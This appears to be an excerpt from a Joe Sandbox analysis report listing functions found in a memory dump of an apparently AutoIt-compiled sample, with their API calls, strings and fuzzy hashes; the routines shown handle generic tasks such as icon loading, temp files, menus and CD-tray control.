API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2091158083-3440237614
Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
Instruction ID: f30a2b88ae2cc0499f235c0a20d277a7e90d3847dc9f1bd621bbe44e473aeabc
Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
Instruction Fuzzy Hash: F9718172619A8292E711EB15E8547F9A720FB86F94FC10132EA4E07ABDCF7CD145C750

Function 00007FF7A5223FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32 ref: 00007FF7A5224077
GetDriveTypeW.KERNEL32 ref: 00007FF7A5224162
mciSendStringW.WINMM ref: 00007FF7A52241AA
mciSendStringW.WINMM ref: 00007FF7A52241F1
mciSendStringW.WINMM ref: 00007FF7A5224229

Strings

open, xrefs: 00007FF7A52240DC
set cd door , xrefs: 00007FF7A52241B8
wait, xrefs: 00007FF7A52241D5
type cdaudio alias cd wait, xrefs: 00007FF7A522418E
closed, xrefs: 00007FF7A522408C
open , xrefs: 00007FF7A5224171
close, xrefs: 00007FF7A522407D
close cd wait, xrefs: 00007FF7A522420D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1600147383-4113822522
Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
Instruction ID: ea411010a8cfcbd0d0b9e9b2a13d4edd15a7d9705e1d87597e6f63fb7ef7de0b
Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
Instruction Fuzzy Hash: 6481AC76B16A1285EB00EB65D8502BCA3A1FB56F98F924531CE0D476A8DF3CE946C360

Function 00007FF7A5250118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00007FF7A5250201
LoadLibraryExW.KERNEL32 ref: 00007FF7A525026C
LoadImageW.USER32 ref: 00007FF7A52502B0
LoadImageW.USER32 ref: 00007FF7A52502EB
LoadImageW.USER32 ref: 00007FF7A525032F
FreeLibrary.KERNEL32 ref: 00007FF7A525033C
ExtractIconExW.SHELL32 ref: 00007FF7A525034E
DestroyIcon.USER32 ref: 00007FF7A5250360
SendMessageW.USER32 ref: 00007FF7A525037F
SendMessageW.USER32 ref: 00007FF7A5250397

Part of subcall function 00007FF7A51C8E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C8E4F

Part of subcall function 00007FF7A51C8E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C8EED

Strings

.dll, xrefs: 00007FF7A52501B5
.icl, xrefs: 00007FF7A5250171
.exe, xrefs: 00007FF7A5250193

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 258715311-1154884017
Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
Instruction ID: 6d9ebb4434733307dc798eb73e809ee5890fde44b512a99a66edfb940f249566
Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
Instruction Fuzzy Hash: 6871D362A0666282EB65EF21EC446B9A3A0FB46F94F860635DD1D477F8DF3DE444C320

Function 00007FF7A52503D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7A5250422
GetFileSize.KERNEL32 ref: 00007FF7A5250436
GlobalAlloc.KERNEL32 ref: 00007FF7A5250445
CloseHandle.KERNEL32 ref: 00007FF7A5250456
GlobalLock.KERNEL32 ref: 00007FF7A5250466
ReadFile.KERNEL32 ref: 00007FF7A525047E
GlobalUnlock.KERNEL32 ref: 00007FF7A5250489
CloseHandle.KERNEL32 ref: 00007FF7A5250492
CreateStreamOnHGlobal.OLE32 ref: 00007FF7A52504A8
OleLoadPicture.OLEAUT32 ref: 00007FF7A52504CB
GlobalFree.KERNEL32 ref: 00007FF7A52504DE
GetObjectW.GDI32 ref: 00007FF7A5250508
CopyImage.USER32 ref: 00007FF7A5250541
DeleteObject.GDI32 ref: 00007FF7A525056E
SendMessageW.USER32 ref: 00007FF7A525058D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
Instruction ID: 893013be33036282f5e5001b9169bcc886b3deaa8cf70c8cdb796b96694ce1ed
Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
Instruction Fuzzy Hash: 74514666B16A4186EB14EF62E844AA973A0FB49F94F914131DE1E03BA8DF3EE405C710

Function 00007FF7A5220D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A522102D
VariantClear.OLEAUT32 ref: 00007FF7A522111F

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00007FF7A5220F10
Default, xrefs: 00007FF7A5220E89

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$ClearInit
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 2610073882-3931177956
Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
Instruction ID: 430b64ff1220320b0458727975101936ae9654c812a5977123ad44759bbd01cf
Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
Instruction Fuzzy Hash: 38028FB6E0A64281E769BB25D85467CA3A1FF46F40F8A4535DA0E07AF8DF3DE550C320

Function 00007FF7A522246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF7A5222590
wcscat.LIBCMT ref: 00007FF7A52225A3
wcscat.LIBCMT ref: 00007FF7A52225E1
wcscat.LIBCMT ref: 00007FF7A52225F4

Part of subcall function 00007FF7A51A67D8: _fread_nolock.LIBCMT ref: 00007FF7A51A6805

GetTempPathW.KERNEL32 ref: 00007FF7A522271B
GetTempFileNameW.KERNEL32 ref: 00007FF7A5222737

Part of subcall function 00007FF7A51D48E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4835

DeleteFileW.KERNEL32 ref: 00007FF7A5222854
DeleteFileW.KERNEL32 ref: 00007FF7A52228BB

Strings

aut, xrefs: 00007FF7A5222729

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
String ID: aut
API String ID: 130057722-3010740371
Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
Instruction ID: 656ba50bfd48fdd3759b82d8c980601cfe4016e1eec661544934dc4cf7471943
Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
Instruction Fuzzy Hash: 9EC181766196C695EB21EF25E8406FDA360FB86B88F814032EA4D07BADDF7DD205C710

Function 00007FF7A524E40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00007FF7A524E510
CreateWindowExW.USER32 ref: 00007FF7A524E5BC
SendMessageW.USER32 ref: 00007FF7A524E5E3
SendMessageW.USER32 ref: 00007FF7A524E5F8
DestroyWindow.USER32 ref: 00007FF7A524E61C
CreateWindowExW.USER32 ref: 00007FF7A524E675
SendMessageW.USER32 ref: 00007FF7A524E692
GetDesktopWindow.USER32 ref: 00007FF7A524E6AE
GetWindowRect.USER32 ref: 00007FF7A524E6BB
SendMessageW.USER32 ref: 00007FF7A524E6D0
SendMessageW.USER32 ref: 00007FF7A524E6EE

Strings

tooltips_class32, xrefs: 00007FF7A524E570, 00007FF7A524E63F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopRect
String ID: tooltips_class32
API String ID: 2443926738-1918224756
Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
Instruction ID: 57ba05b7113855eba062a6ffe65a07d0cd68541d0fd239f686b3d1a8a9a2d441
Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
Instruction Fuzzy Hash: D9917976A1AA8585F750DF65E8407ADB7A1EB8AF84F814036DE4D07BA8DF3CE045C720

Function 00007FF7A5228BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00007FF7A5228CDA
SystemTimeToFileTime.KERNEL32 ref: 00007FF7A5228CEC
LocalFileTimeToFileTime.KERNEL32 ref: 00007FF7A5228D00
wcscat.LIBCMT ref: 00007FF7A5228D84
wcscat.LIBCMT ref: 00007FF7A5228D95
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228DA6
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228DB3
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228DEE
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228E3F
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228E4C
wcscpy.LIBCMT ref: 00007FF7A5228E5E

Strings

*.*, xrefs: 00007FF7A5228E52

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
String ID: *.*
API String ID: 1111067124-438819550
Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
Instruction ID: 51da3a087b20c511af912cf7faad3c2a55be2b01c52a59641bee039802758aa0
Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
Instruction Fuzzy Hash: 27719F7661AB8691DB11EF11E8401BEA321FB86F88F820031EA4D477BADF3DE549C750

Function 00007FF7A5234F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7A5234FDF
CreateCompatibleBitmap.GDI32 ref: 00007FF7A5234FF3
CreateCompatibleDC.GDI32 ref: 00007FF7A5235001
SelectObject.GDI32 ref: 00007FF7A5235011
StretchBlt.GDI32 ref: 00007FF7A5235087
GetDIBits.GDI32 ref: 00007FF7A52350CE
GetDIBits.GDI32 ref: 00007FF7A5235107
SelectObject.GDI32 ref: 00007FF7A5235116
DeleteObject.GDI32 ref: 00007FF7A523511F
DeleteDC.GDI32 ref: 00007FF7A5235128
ReleaseDC.USER32 ref: 00007FF7A5235133

Strings

, xrefs: 00007FF7A5235053

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID:
API String ID: 2598888154-3916222277
Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
Instruction ID: 2b67e82446e7dbcc7afb923fc8caf29bfa3c27f475ca464adb69cc8c4e722254
Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
Instruction Fuzzy Hash: A55198B6B16640CBE750DF65E8446ADB7B0F749B98F408125EE4953B68CF3CE4058B10

Function 00007FF7A520B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32 ref: 00007FF7A520B101
SafeArrayAllocData.OLEAUT32 ref: 00007FF7A520B163
VariantInit.OLEAUT32 ref: 00007FF7A520B175
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A520B198
VariantCopy.OLEAUT32 ref: 00007FF7A520B203
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF7A520B217
VariantClear.OLEAUT32 ref: 00007FF7A520B22E
SafeArrayDestroyData.OLEAUT32 ref: 00007FF7A520B23D
SafeArrayDestroyDescriptor.OLEAUT32 ref: 00007FF7A520B247
VariantClear.OLEAUT32 ref: 00007FF7A520B25A
SafeArrayDestroyDescriptor.OLEAUT32 ref: 00007FF7A520B266

Strings

NULL Pointer assignment, xrefs: 00007FF7A520B0D3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID: NULL Pointer assignment
API String ID: 2706829360-2785691316
Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
Instruction ID: db4f29e0d45eef0db2b0f2f6a3f6a5ad6a983363fb9ebdae678c8882c9b0ff90
Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
Instruction Fuzzy Hash: 66514262B16A128AEB10EF65DC856BCA770FB95F88F824031DA0E476BDDF38D485C350

Function 00007FF7A5241110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7A523FD7B), ref: 00007FF7A5241143

Strings

HKEY_USERS, xrefs: 00007FF7A5241505
HKCR, xrefs: 00007FF7A5241369
HKLM, xrefs: 00007FF7A52412C2
HKCU, xrefs: 00007FF7A52414A8
HKEY_CLASSES_ROOT, xrefs: 00007FF7A524132C
HKEY_CURRENT_USER, xrefs: 00007FF7A524146B
HKCC, xrefs: 00007FF7A524140E
HKU, xrefs: 00007FF7A5241542
HKEY_LOCAL_MACHINE, xrefs: 00007FF7A5241285
HKEY_CURRENT_CONFIG, xrefs: 00007FF7A52413D1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
Instruction ID: 04f0f39fdfdb71330455530686b1ea2ea056c3ddbf285ed4e4f46ca6f31806c9
Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
Instruction Fuzzy Hash: DDE18492F4A65781EA64AB65DC402B9B3A0BF12F98FC64531C91D477ECEE3CE9458320

Function 00007FF7A52287CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

wcscat.LIBCMT ref: 00007FF7A522898D
wcscat.LIBCMT ref: 00007FF7A522899E
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7A52289AF
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A52289BC
GetFileAttributesW.KERNEL32 ref: 00007FF7A52289ED
SetFileAttributesW.KERNEL32 ref: 00007FF7A5228A03
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228A14
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228A76
wcscpy.LIBCMT ref: 00007FF7A5228A88
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A5228AC5

Strings

*.*, xrefs: 00007FF7A5228A7C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
String ID: *.*
API String ID: 4125642244-438819550
Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
Instruction ID: b70b13eb45c50fdcf8205458523d70e3ce359d6696d9f48a8b1b2512501bd641
Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
Instruction Fuzzy Hash: 44819066A19B8691EB10EF15D8406BDA3A0FB45F84FC60036EA4E47AE9DF7CE544C720

Function 00007FF7A521A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF7A521A4B8
SetMenuItemInfoW.USER32 ref: 00007FF7A521A4F0
Sleep.KERNEL32 ref: 00007FF7A521A503
GetMenuItemCount.USER32 ref: 00007FF7A521A549
GetMenuItemID.USER32 ref: 00007FF7A521A566
GetMenuItemID.USER32 ref: 00007FF7A521A58D
GetMenuItemID.USER32 ref: 00007FF7A521A5CB
CheckMenuRadioItem.USER32 ref: 00007FF7A521A610
GetMenuItemInfoW.USER32 ref: 00007FF7A521A62B
SetMenuItemInfoW.USER32 ref: 00007FF7A521A650

Strings

P, xrefs: 00007FF7A521A432

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: P
API String ID: 1460738036-3110715001
Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
Instruction ID: 29bdbbbb688c1df4d19c8d9017258f46e2a53fb4ddd1b90435260a561b7a1152
Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
Instruction Fuzzy Hash: 3271E5B1E0E68246EB21EF249C442BEA761BB46F48F964031DA4D076EDCF7DE446C760

Function 00007FF7A5223268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7A52232C5
LoadStringW.USER32 ref: 00007FF7A52232EB
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A5223433
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A522344F

Strings

Incorrect parameters to object property !, xrefs: 00007FF7A52233B0
"%s" (%d) : ==> %s:, xrefs: 00007FF7A5223441
Error: , xrefs: 00007FF7A52233E1
Line %d (File "%s"):, xrefs: 00007FF7A5223338
"%s" (%d) : ==> %s:%s%s, xrefs: 00007FF7A522341A
^ ERROR , xrefs: 00007FF7A522339F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LoadStringwprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 3297454147-3080491070
Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
Instruction ID: 12242fc517272fc798a945acab71cbf55bae85ff54753c89f07d3ba63f813f84
Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
Instruction Fuzzy Hash: 7F615162B1AA4292EB11FB64E8405FDA360FB96F44FC21032EA4D136BDDE7CE506C750

Function 00007FF7A52174B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000087FFFFFE03FF,00007FF7A51EEA7B,?,?,?,?,?,?,?), ref: 00007FF7A52174EA
LoadStringW.USER32 ref: 00007FF7A5217505
